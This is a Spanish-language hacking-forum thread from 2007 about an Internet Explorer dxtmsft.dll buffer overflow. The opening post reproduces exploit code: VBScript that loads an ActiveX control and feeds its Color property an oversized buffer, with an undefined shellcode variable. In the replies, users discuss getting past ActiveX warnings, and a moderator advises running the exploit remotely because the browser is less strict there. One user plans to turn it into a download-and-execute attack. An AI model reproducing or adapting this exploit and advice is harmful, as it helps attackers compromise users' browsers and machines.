elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 19:25  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Internet Explorer dxtmsft.dll Buffer Overflow - 0day		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Internet Explorer dxtmsft.dll Buffer Overflow - 0day  (Leído 461 veces)
yeikos
Colaborador

Desconectado Desconectado

Mensajes: 1.363



Ver Perfil
Internet Explorer dxtmsft.dll Buffer Overflow - 0day
« en: 01 Agosto 2007, 02:16 »
Citar
<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>

<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
 Sub jojo
  buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")

  get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"

  buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")

  egg = buff + get_EDX + buff1 + scode

  Chroma.Color = egg
 End Sub
</script>

Fuente: http://www.milw0rm.com/exploits/4251
En línea
EvilGoblin

Conectado Conectado

Mensajes: 861


LAIN IS LAIN


Ver Perfil
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
« Respuesta #1 en: 01 Agosto 2007, 14:16 »
y..... se puede modificar para ejecutar la calculadora de Windows? =P (como ejemplo)

Salto la proteccion de windows para la ejecucion de Activex =(

luego de eso funciona...

pero xP hay q habilitar 2 veces... el primero la franga amarilla que apare arriba.. y depsues te aparece un mensaje de "ESTA REALMENTE SEGURO???"

xD

^^
« Última modificación: 01 Agosto 2007, 14:21 por evilgoblin » En línea


Experimental Serials Lain
sirdarckcat
sdc
Moderador
*****
Conectado Conectado

Mensajes: 4.641


HAND


Ver Perfil WWW
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
« Respuesta #2 en: 01 Agosto 2007, 21:36 »
no hagas el intento en local, hazlo remoto.. iexplorer es mas paranoico en local que en remoto..

Saludos!!
En línea
Mis páginas web:
- mi web, my blog, my web
http://ejemplode.com/, http://sybsecurity.com/
EvilGoblin

Conectado Conectado

Mensajes: 861


LAIN IS LAIN


Ver Perfil
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
« Respuesta #3 en: 01 Agosto 2007, 21:51 »
Tienes Razon!! xD

Remotamente no me aviso de ningun Control Activex =)


ahora leere como hacer para ejecutar la calculadora...

o algun DOWNLOAD & EXECUTE ^^

si lo logro lo posteo ^^..
En línea


Experimental Serials Lain
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC